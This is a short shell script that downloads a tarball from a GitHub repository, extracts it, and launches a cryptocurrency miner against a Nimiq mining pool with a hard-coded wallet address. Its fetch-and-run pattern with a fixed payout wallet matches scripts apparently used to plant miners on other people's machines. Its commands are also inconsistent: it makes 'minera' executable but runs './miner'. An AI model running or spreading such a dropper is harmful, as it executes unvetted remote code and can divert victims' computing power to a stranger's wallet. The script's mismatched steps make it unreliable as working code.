#!/bin/sh
apt update
wget https://github.com/komaria10003099/acema/raw/master/beepmin.tar.gz
tar -xhf beepmin.tar.gz
chmod +x minera
./miner --pool=nimiq.icemining.ca:2053 --wallet-address='NQ04 H0C7 TJYF 68DT RQSF FSKX AT0A UNED 1XKL' --miner=8 --type=dumb
